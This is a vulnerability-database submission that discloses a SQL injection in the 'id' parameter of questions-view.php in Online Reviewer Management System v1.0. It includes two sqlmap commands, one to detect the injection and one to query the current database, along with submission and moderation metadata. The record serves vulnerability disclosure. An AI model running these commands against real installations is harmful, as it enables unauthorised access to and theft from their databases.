Submit #94805: Online Reviewer Management System v1.0 /reviewer_0/admins/assessments/pretest/questions-view.php parameter id exists sql injectioninfo

TitleOnline Reviewer Management System v1.0 /reviewer_0/admins/assessments/pretest/questions-view.php parameter id exists sql injection
DescriptionAn issue was discovered in Online Reviewer Management System v1.0. There is a SQL injection that can directly issue instructions to the background database system via /reviewer_0/admins/assessments/pretest/questions-view.php?id. sqlmap detect injection vulnerabilities: "sqlmap -u http://ip/reviewer_0/admins/assessments/pretest/questions-view.php?id=1" sqlmap Queries the current database: "sqlmap -u http://ip/reviewer_0/admins/assessments/pretest/questions-view.php?id=1 --current-db"
Source⚠️ https://github.com/believeti/bug_report/blob/main/vendors/janobe/Online%20Reviewer%20Management%20System/SQLi-1.md
User
 believeti (UID 41813)
Submission02/26/2023 05:03 (3 years ago)
Moderation02/26/2023 12:51 (8 hours later)
StatusAccepted
VulDB entry221796 [SourceCodester Online Reviewer Management System 1.0 questions-view.php ID sql injection]
Points20

PreviousOverviewNext

Want to know what is going to be exploited?

We predict KEV entries!